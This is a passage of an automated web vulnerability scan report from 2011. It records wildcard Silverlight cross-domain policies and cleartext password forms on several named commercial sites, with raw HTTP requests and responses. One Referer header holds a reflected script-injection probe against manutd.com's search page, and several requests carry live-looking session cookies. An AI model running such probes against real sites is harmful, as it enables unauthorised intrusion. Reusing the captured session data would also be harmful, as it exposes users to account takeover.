Server: sffe
X-XSS-Protection: 1; mode=block
Age: 9563
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
6.15. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-uk.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-uk.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 02 Oct 2011 23:51:44 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 09 Oct 2011 23:51:44 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
6.16. http://speed.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:49:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...
7. Cleartext submission of password  previous  next
There are 12 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...
7.2. http://www.hotelplanner.com/Search/Index.cfm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...
7.3. http://www.manutd.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 26620
Cache-Control: public, max-age=153
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...
7.4. http://www.manutd.com/One-United/Login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United/Login.aspx%3fredirectPath%3d%2fen%2fFanzone%2fCompetition-And-Polls%2fCompetition.aspx%3fid%3d%257BA04F2C18-1A4F-437D-B2BF-26E32C2683B7%257D%26regmode%3dfull" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United/Login.aspx" class="hiddeninput" />
...[SNIP]...
7.5. http://www.manutd.com/One-United/Login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div class="login regform LoginContainerStyles">
<form method="post" action="" id="members">
<br />
...[SNIP]...
</label>
<input name="phcontent_0$phoneunitedcontent_0$phcolumn1_1$password" type="password" id="phcontent_0_phoneunitedcontent_0_phcolumn1_1_password" tabindex="6" title="Password:" />
<div class="rule" style="margin-bottom: 15px;">
...[SNIP]...
7.6. http://www.manutd.com/Search-Results.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Search-Results.aspx%3fqs%3dmanutd_frontend%26catTxt%3d%26searchText%3dxss" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Search-Results.aspx" class="hiddeninput" />
...[SNIP]...
7.7. http://www.manutd.com/en.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 26620
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...
7.8. http://www.manutd.com/en/Club/Sponsors.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Club/Sponsors.aspx%3fsponsorid%3d%257BF745DA14-CB5E-4A81-816A-8DB410E47A75%257D" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Club/Sponsors.aspx" class="hiddeninput" />
...[SNIP]...
7.9. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Fanzone/Competition-And-Polls.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/Fanzone/Competition-And-Polls.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.7.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 19323
Cache-Control: public, max-age=1
Date: Mon, 03 Oct 2011 00:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Fanzone/Competition-And-Polls.aspx" class="hiddeninput" />
...[SNIP]...
7.10. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.2.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 28270
Cache-Control: public, max-age=553
Date: Sun, 02 Oct 2011 23:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx" class="hiddeninput" />
...[SNIP]...
7.11. http://www.manutd.com/en/One-United.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/One-United.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en/One-United.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.3.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 23135
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:54:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United.aspx" class="hiddeninput" />
...[SNIP]...
7.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

